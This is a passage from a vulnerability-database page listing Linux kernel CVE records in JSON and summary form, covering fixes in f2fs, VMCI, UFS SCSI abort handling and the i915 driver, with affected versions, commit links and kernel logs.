case, f2fs_map_blocks() and f2fs_map_blocks_cached()\nmodify map-\u003em_pblk as the physical block address from each block device. It\nbecomes zero when it is mapped to the first block of the device. However,\nf2fs_iomap_begin() assumes that map-\u003em_pblk is the physical block address of the\nwhole f2fs, across the all block devices. It compares map-\u003em_pblk against\nNULL_ADDR == 0, then go into the unexpected branch and sets the invalid\niomap-\u003elength. The WARN catches the invalid iomap-\u003elength.\n\nThis WARN is printed even for non-zoned block devices, by following steps.\n\n - Create two (non-zoned) null_blk devices memory backed with 128MB size each:\n   nullb0 and nullb1.\n # mkfs.f2fs /dev/nullb0 -c /dev/nullb1\n # mount -t f2fs /dev/nullb0 \"${mount_dir}\"\n # dd if=/dev/zero of=\"${mount_dir}/test.dat\" bs=1M count=192\n # dd if=\"${mount_dir}/test.dat\" of=/dev/null bs=1M count=192 iflag=direct\n\n...\"\n\nSo, the root cause of this issue is: when multi-devices feature is on,\nf2fs_map_blocks() may return zero blkaddr in non-primary device, which is\na verified valid block address, however, f2fs_iomap_begin() treats it as\nan invalid block address, and then it triggers the warning in iomap\nframework code.\n\nFinally, as discussed, we decide to use a more simple and direct way that\nchecking (map.m_flags \u0026 F2FS_MAP_MAPPED) condition instead of\n(map.m_pblk != NULL_ADDR) to fix this issue.\n\nThanks a lot for the effort of Yi Zhang and Shinichiro Kawasaki on this\nissue.\n\n[1] https://lore.kernel.org/linux-f2fs-devel/CAHj4cs-kfojYC9i0G73PRkYzcxCTex=-vugRFeP40g_URGvnfQ@mail.gmail.com/\n[2] https://lore.kernel.org/linux-f2fs-devel/gngdj77k4picagsfdtiaa7gpgnup6fsgwzsltx6milmhegmjff@iax2n4wvrqye/"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:15:54.415Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/1a9225fdd0ec95fcf32936bcea9ceef0cf1512dc"
        },
        {
          "url": "https://git.kernel.org/stable/c/2b2611a42462c6c685d40b5f3aedcd8d21c27065"
        },
        {
          "url": "https://git.kernel.org/stable/c/e8b485e39b4d17afa9a2821fc778d5a67abfc03a"
        },
        {
          "url": "https://git.kernel.org/stable/c/33e62cd7b4c281cd737c62e5d8c4f0e602a8c5c5"
        }
      ],
      "title": "f2fs: multidev: fix to recognize valid zero block address",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38636",
    "datePublished": "2024-06-21T10:18:24.900Z",
    "dateReserved": "2024-06-18T19:36:34.947Z",
    "dateUpdated": "2025-05-04T09:15:54.415Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35944 (GCVE-0-2024-35944)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2026-01-05 10:36

Title

VMCI: Fix memcpy() run-time warning in dg_dispatch_as_host()

Summary

In the Linux kernel, the following vulnerability has been resolved: VMCI: Fix memcpy() run-time warning in dg_dispatch_as_host() Syzkaller hit 'WARNING in dg_dispatch_as_host' bug. memcpy: detected field-spanning write (size 56) of single field "&dg_info->msg" at drivers/misc/vmw_vmci/vmci_datagram.c:237 (size 24) WARNING: CPU: 0 PID: 1555 at drivers/misc/vmw_vmci/vmci_datagram.c:237 dg_dispatch_as_host+0x88e/0xa60 drivers/misc/vmw_vmci/vmci_datagram.c:237 Some code commentry, based on my understanding: 544 #define VMCI_DG_SIZE(_dg) (VMCI_DG_HEADERSIZE + (size_t)(_dg)->payload_size) /// This is 24 + payload_size memcpy(&dg_info->msg, dg, dg_size); Destination = dg_info->msg ---> this is a 24 byte structure(struct vmci_datagram) Source = dg --> this is a 24 byte structure (struct vmci_datagram) Size = dg_size = 24 + payload_size {payload_size = 56-24 =32} -- Syzkaller managed to set payload_size to 32. 35 struct delayed_datagram_info { 36 struct datagram_entry *entry; 37 struct work_struct work; 38 bool in_dg_host_queue; 39 /* msg and msg_payload must be together. */ 40 struct vmci_datagram msg; 41 u8 msg_payload[]; 42 }; So those extra bytes of payload are copied into msg_payload[], a run time warning is seen while fuzzing with Syzkaller. One possible way to fix the warning is to split the memcpy() into two parts -- one -- direct assignment of msg and second taking care of payload. Gustavo quoted: "Under FORTIFY_SOURCE we should not copy data across multiple members in a structure."

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e87bb99d2df6512d8…
	https://git.kernel.org/stable/c/f15eca95138b3d4ec…
	https://git.kernel.org/stable/c/ad78c5047dc4076d0…
	https://git.kernel.org/stable/c/130b0cd064874e0d0…
	https://git.kernel.org/stable/c/feacd430b42bbfa9a…
	https://git.kernel.org/stable/c/dae70a57565686f16…
	https://git.kernel.org/stable/c/491a1eb07c2bd8841…
	https://git.kernel.org/stable/c/19b070fefd0d024af…

Impacted products

Vendor

Product

Version

Linux

Affected: a110b7ebb9c674a2b591af2780dd512ad0198d50 , < e87bb99d2df6512d8ee37a5d63d2ca9a39a8c051 (git)
Affected: a110b7ebb9c674a2b591af2780dd512ad0198d50 , < f15eca95138b3d4ec17b63c3c1937b0aa0d3624b (git)
Affected: a110b7ebb9c674a2b591af2780dd512ad0198d50 , < ad78c5047dc4076d0b3c4fad4f42ffe9c86e8100 (git)
Affected: a110b7ebb9c674a2b591af2780dd512ad0198d50 , < 130b0cd064874e0d0f58e18fb00e6f3993e90c74 (git)
Affected: a110b7ebb9c674a2b591af2780dd512ad0198d50 , < feacd430b42bbfa9ab3ed9e4f38b86c43e348c75 (git)
Affected: a110b7ebb9c674a2b591af2780dd512ad0198d50 , < dae70a57565686f16089737adb8ac64471570f73 (git)
Affected: a110b7ebb9c674a2b591af2780dd512ad0198d50 , < 491a1eb07c2bd8841d63cb5263455e185be5866f (git)
Affected: a110b7ebb9c674a2b591af2780dd512ad0198d50 , < 19b070fefd0d024af3daa7329cbc0d00de5302ec (git)

Linux

Affected: 3.9
Unaffected: 0 , < 3.9 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35944",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:30:02.800597Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:54.146Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.080Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e87bb99d2df6512d8ee37a5d63d2ca9a39a8c051"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f15eca95138b3d4ec17b63c3c1937b0aa0d3624b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ad78c5047dc4076d0b3c4fad4f42ffe9c86e8100"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/130b0cd064874e0d0f58e18fb00e6f3993e90c74"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/feacd430b42bbfa9ab3ed9e4f38b86c43e348c75"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dae70a57565686f16089737adb8ac64471570f73"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/491a1eb07c2bd8841d63cb5263455e185be5866f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/19b070fefd0d024af3daa7329cbc0d00de5302ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/misc/vmw_vmci/vmci_datagram.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e87bb99d2df6512d8ee37a5d63d2ca9a39a8c051",
              "status": "affected",
              "version": "a110b7ebb9c674a2b591af2780dd512ad0198d50",
              "versionType": "git"
            },
            {
              "lessThan": "f15eca95138b3d4ec17b63c3c1937b0aa0d3624b",
              "status": "affected",
              "version": "a110b7ebb9c674a2b591af2780dd512ad0198d50",
              "versionType": "git"
            },
            {
              "lessThan": "ad78c5047dc4076d0b3c4fad4f42ffe9c86e8100",
              "status": "affected",
              "version": "a110b7ebb9c674a2b591af2780dd512ad0198d50",
              "versionType": "git"
            },
            {
              "lessThan": "130b0cd064874e0d0f58e18fb00e6f3993e90c74",
              "status": "affected",
              "version": "a110b7ebb9c674a2b591af2780dd512ad0198d50",
              "versionType": "git"
            },
            {
              "lessThan": "feacd430b42bbfa9ab3ed9e4f38b86c43e348c75",
              "status": "affected",
              "version": "a110b7ebb9c674a2b591af2780dd512ad0198d50",
              "versionType": "git"
            },
            {
              "lessThan": "dae70a57565686f16089737adb8ac64471570f73",
              "status": "affected",
              "version": "a110b7ebb9c674a2b591af2780dd512ad0198d50",
              "versionType": "git"
            },
            {
              "lessThan": "491a1eb07c2bd8841d63cb5263455e185be5866f",
              "status": "affected",
              "version": "a110b7ebb9c674a2b591af2780dd512ad0198d50",
              "versionType": "git"
            },
            {
              "lessThan": "19b070fefd0d024af3daa7329cbc0d00de5302ec",
              "status": "affected",
              "version": "a110b7ebb9c674a2b591af2780dd512ad0198d50",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/misc/vmw_vmci/vmci_datagram.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.9"
            },
            {
              "lessThan": "3.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.9",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nVMCI: Fix memcpy() run-time warning in dg_dispatch_as_host()\n\nSyzkaller hit \u0027WARNING in dg_dispatch_as_host\u0027 bug.\n\nmemcpy: detected field-spanning write (size 56) of single field \"\u0026dg_info-\u003emsg\"\nat drivers/misc/vmw_vmci/vmci_datagram.c:237 (size 24)\n\nWARNING: CPU: 0 PID: 1555 at drivers/misc/vmw_vmci/vmci_datagram.c:237\ndg_dispatch_as_host+0x88e/0xa60 drivers/misc/vmw_vmci/vmci_datagram.c:237\n\nSome code commentry, based on my understanding:\n\n544 #define VMCI_DG_SIZE(_dg) (VMCI_DG_HEADERSIZE + (size_t)(_dg)-\u003epayload_size)\n/// This is 24 + payload_size\n\nmemcpy(\u0026dg_info-\u003emsg, dg, dg_size);\n\tDestination = dg_info-\u003emsg ---\u003e this is a 24 byte\n\t\t\t\t\tstructure(struct vmci_datagram)\n\tSource = dg --\u003e this is a 24 byte structure (struct vmci_datagram)\n\tSize = dg_size = 24 + payload_size\n\n{payload_size = 56-24 =32} -- Syzkaller managed to set payload_size to 32.\n\n 35 struct delayed_datagram_info {\n 36         struct datagram_entry *entry;\n 37         struct work_struct work;\n 38         bool in_dg_host_queue;\n 39         /* msg and msg_payload must be together. */\n 40         struct vmci_datagram msg;\n 41         u8 msg_payload[];\n 42 };\n\nSo those extra bytes of payload are copied into msg_payload[], a run time\nwarning is seen while fuzzing with Syzkaller.\n\nOne possible way to fix the warning is to split the memcpy() into\ntwo parts -- one -- direct assignment of msg and second taking care of payload.\n\nGustavo quoted:\n\"Under FORTIFY_SOURCE we should not copy data across multiple members\nin a structure.\""
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:02.870Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e87bb99d2df6512d8ee37a5d63d2ca9a39a8c051"
        },
        {
          "url": "https://git.kernel.org/stable/c/f15eca95138b3d4ec17b63c3c1937b0aa0d3624b"
        },
        {
          "url": "https://git.kernel.org/stable/c/ad78c5047dc4076d0b3c4fad4f42ffe9c86e8100"
        },
        {
          "url": "https://git.kernel.org/stable/c/130b0cd064874e0d0f58e18fb00e6f3993e90c74"
        },
        {
          "url": "https://git.kernel.org/stable/c/feacd430b42bbfa9ab3ed9e4f38b86c43e348c75"
        },
        {
          "url": "https://git.kernel.org/stable/c/dae70a57565686f16089737adb8ac64471570f73"
        },
        {
          "url": "https://git.kernel.org/stable/c/491a1eb07c2bd8841d63cb5263455e185be5866f"
        },
        {
          "url": "https://git.kernel.org/stable/c/19b070fefd0d024af3daa7329cbc0d00de5302ec"
        }
      ],
      "title": "VMCI: Fix memcpy() run-time warning in dg_dispatch_as_host()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35944",
    "datePublished": "2024-05-19T10:10:48.183Z",
    "dateReserved": "2024-05-17T13:50:33.133Z",
    "dateUpdated": "2026-01-05T10:36:02.870Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2021-47188 (GCVE-0-2021-47188)

Vulnerability from cvelistv5 – Published: 2024-04-10 18:56 – Updated: 2025-05-04 07:06

Title

scsi: ufs: core: Improve SCSI abort handling

Summary

In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Improve SCSI abort handling The following has been observed on a test setup: WARNING: CPU: 4 PID: 250 at drivers/scsi/ufs/ufshcd.c:2737 ufshcd_queuecommand+0x468/0x65c Call trace: ufshcd_queuecommand+0x468/0x65c scsi_send_eh_cmnd+0x224/0x6a0 scsi_eh_test_devices+0x248/0x418 scsi_eh_ready_devs+0xc34/0xe58 scsi_error_handler+0x204/0x80c kthread+0x150/0x1b4 ret_from_fork+0x10/0x30 That warning is triggered by the following statement: WARN_ON(lrbp->cmd); Fix this warning by clearing lrbp->cmd from the abort handler.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c36baca06efa833ad…
	https://git.kernel.org/stable/c/3ff1f6b6ba6f97f50…

Impacted products

Vendor

Product

Version

Linux

Affected: 7a3e97b0dc4bbac2ba7803564ab0057722689921 , < c36baca06efa833adaefba61f45fefdc49b6d070 (git)
Affected: 7a3e97b0dc4bbac2ba7803564ab0057722689921 , < 3ff1f6b6ba6f97f50862aa50e79959cc8ddc2566 (git)

Linux

Affected: 3.4
Unaffected: 0 , < 3.4 (semver)
Unaffected: 5.15.5 , ≤ 5.15.* (semver)
Unaffected: 5.16 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T05:32:07.411Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c36baca06efa833adaefba61f45fefdc49b6d070"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ff1f6b6ba6f97f50862aa50e79959cc8ddc2566"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-47188",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:50:11.298126Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:39.156Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/ufs/ufshcd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c36baca06efa833adaefba61f45fefdc49b6d070",
              "status": "affected",
              "version": "7a3e97b0dc4bbac2ba7803564ab0057722689921",
              "versionType": "git"
            },
            {
              "lessThan": "3ff1f6b6ba6f97f50862aa50e79959cc8ddc2566",
              "status": "affected",
              "version": "7a3e97b0dc4bbac2ba7803564ab0057722689921",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/ufs/ufshcd.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.4"
            },
            {
              "lessThan": "3.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.16",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.5",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16",
                  "versionStartIncluding": "3.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: ufs: core: Improve SCSI abort handling\n\nThe following has been observed on a test setup:\n\nWARNING: CPU: 4 PID: 250 at drivers/scsi/ufs/ufshcd.c:2737 ufshcd_queuecommand+0x468/0x65c\nCall trace:\n ufshcd_queuecommand+0x468/0x65c\n scsi_send_eh_cmnd+0x224/0x6a0\n scsi_eh_test_devices+0x248/0x418\n scsi_eh_ready_devs+0xc34/0xe58\n scsi_error_handler+0x204/0x80c\n kthread+0x150/0x1b4\n ret_from_fork+0x10/0x30\n\nThat warning is triggered by the following statement:\n\n\tWARN_ON(lrbp-\u003ecmd);\n\nFix this warning by clearing lrbp-\u003ecmd from the abort handler."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T07:06:00.229Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c36baca06efa833adaefba61f45fefdc49b6d070"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ff1f6b6ba6f97f50862aa50e79959cc8ddc2566"
        }
      ],
      "title": "scsi: ufs: core: Improve SCSI abort handling",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2021-47188",
    "datePublished": "2024-04-10T18:56:27.567Z",
    "dateReserved": "2024-03-25T09:12:14.113Z",
    "dateUpdated": "2025-05-04T07:06:00.229Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26937 (GCVE-0-2024-26937)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:17 – Updated: 2025-05-04 09:00

Title

drm/i915/gt: Reset queue_priority_hint on parking

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt: Reset queue_priority_hint on parking Originally, with strict in order execution, we could complete execution only when the queue was empty. Preempt-to-busy allows replacement of an active request that may complete before the preemption is processed by HW. If that happens, the request is retired from the queue, but the queue_priority_hint remains set, preventing direct submission until after the next CS interrupt is processed. This preempt-to-busy race can be triggered by the heartbeat, which will also act as the power-management barrier and upon completion allow us to idle the HW. We may process the completion of the heartbeat, and begin parking the engine before the CS event that restores the queue_priority_hint, causing us to fail the assertion that it is MIN. <3>[ 166.210729] __engine_park:283 GEM_BUG_ON(engine->sched_engine->queue_priority_hint != (-((int)(~0U >> 1)) - 1)) <0>[ 166.210781] Dumping ftrace buffer: <0>[ 166.210795] --------------------------------- ... <0>[ 167.302811] drm_fdin-1097 2..s1. 165741070us : trace_ports: 0000:00:02.0 rcs0: promote { ccid:20 1217:2 prio 0 } <0>[ 167.302861] drm_fdin-1097 2d.s2. 165741072us : execlists_submission_tasklet: 0000:00:02.0 rcs0: preempting last=1217:2, prio=0, hint=2147483646 <0>[ 167.302928] drm_fdin-1097 2d.s2. 165741072us : __i915_request_unsubmit: 0000:00:02.0 rcs0: fence 1217:2, current 0 <0>[ 167.302992] drm_fdin-1097 2d.s2. 165741073us : __i915_request_submit: 0000:00:02.0 rcs0: fence 3:4660, current 4659 <0>[ 167.303044] drm_fdin-1097 2d.s1. 165741076us : execlists_submission_tasklet: 0000:00:02.0 rcs0: context:3 schedule-in, ccid:40 <0>[ 167.303095] drm_fdin-1097 2d.s1. 165741077us : trace_ports: 0000:00:02.0 rcs0: submit { ccid:40 3:4660* prio 2147483646 } <0>[ 167.303159] kworker/-89 11..... 165741139us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence c90:2, current 2 <0>[ 167.303208] kworker/-89 11..... 165741148us : __intel_context_do_unpin: 0000:00:02.0 rcs0: context:c90 unpin <0>[ 167.303272] kworker/-89 11..... 165741159us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence 1217:2, current 2 <0>[ 167.303321] kworker/-89 11..... 165741166us : __intel_context_do_unpin: 0000:00:02.0 rcs0: context:1217 unpin <0>[ 167.303384] kworker/-89 11..... 165741170us : i915_request_retire.part.0: 0000:00:02.0 rcs0: fence 3:4660, current 4660 <0>[ 167.303434] kworker/-89 11d..1. 165741172us : __intel_context_retire: 0000:00:02.0 rcs0: context:1216 retire runtime: { total:56028ns, avg:56028ns } <0>[ 167.303484] kworker/-89 11..... 165741198us : __engine_park: 0000:00:02.0 rcs0: parked <0>[ 167.303534] <idle>-0 5d.H3. 165741207us : execlists_irq_handler: 0000:00:02.0 rcs0: semaphore yield: 00000040 <0>[ 167.303583] kworker/-89 11..... 165741397us : __intel_context_retire: 0000:00:02.0 rcs0: context:1217 retire runtime: { total:325575ns, avg:0ns } <0>[ 167.303756] kworker/-89 11..... 165741777us : __intel_context_retire: 0000:00:02.0 rcs0: context:c90 retire runtime: { total:0ns, avg:0ns } <0>[ 167.303806] kworker/-89 11..... 165742017us : __engine_park: __engine_park:283 GEM_BUG_ON(engine->sched_engine->queue_priority_hint != (-((int)(~0U >> 1)) - 1)) <0>[ 167.303811] --------------------------------- <4>[ 167.304722] ------------[ cut here ]------------ <2>[ 167.304725] kernel BUG at drivers/gpu/drm/i915/gt/intel_engine_pm.c:283! <4>[ 167.304731] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI <4>[ 167.304734] CPU: 11 PID: 89 Comm: kworker/11:1 Tainted: G W 6.8.0-rc2-CI_DRM_14193-gc655e0fd2804+ #1 <4>[ 167.304736] Hardware name: Intel Corporation Rocket Lake Client Platform/RocketLake S UDIMM 6L RVP, BIOS RKLSFWI1.R00.3173.A03.2204210138 04/21/2022 <4>[ 167.304738] Workqueue: i915-unordered retire_work_handler [i915] <4>[ 16 ---truncated---

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/67944e6db656bf1e9…
	https://git.kernel.org/stable/c/fe34587acc995e7b1…
	https://git.kernel.org/stable/c/ac9b6b3e8d1237136…
	https://git.kernel.org/stable/c/7eab7b021835ae422…
	https://git.kernel.org/stable/c/3b031e4fcb2740988…
	https://git.kernel.org/stable/c/aed034866a08bb7e6…
	https://git.kernel.org/stable/c/8fd9b0ce8c26533fe…
	https://git.kernel.org/stable/c/4a3859ea5240365d2…

Impacted products

Vendor

Product

Version

Linux

Affected: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 , < 67944e6db656bf1e986aa2a359f866f851091f8a (git)
Affected: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 , < fe34587acc995e7b1d7a5d3444a0736721ec32b3 (git)
Affected: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 , < ac9b6b3e8d1237136c8ebf0fa1ce037dd7e2948f (git)
Affected: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 , < 7eab7b021835ae422c38b968d5cc60e99408fb62 (git)
Affected: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 , < 3b031e4fcb2740988143c303f81f69f18ce86325 (git)
Affected: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 , < aed034866a08bb7e6e34d50a5629a4d23fe83703 (git)
Affected: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 , < 8fd9b0ce8c26533fe4d5d15ea15bbf7b904b611c (git)
Affected: 22b7a426bbe1ebe1520f92da4cd1617d1e1b5fc4 , < 4a3859ea5240365d21f6053ee219bb240d520895 (git)

CERTFR-2024-AVI-0799

Solutions

Action not permitted

CERTFR-2024-AVI-0799

Solutions

CVE-2022-48863 (GCVE-0-2022-48863)

CVE-2024-27017 (GCVE-0-2024-27017)

CVE-2024-26935 (GCVE-0-2024-26935)

CVE-2024-40959 (GCVE-0-2024-40959)

CVE-2024-40982 (GCVE-0-2024-40982)

CVE-2024-27401 (GCVE-0-2024-27401)

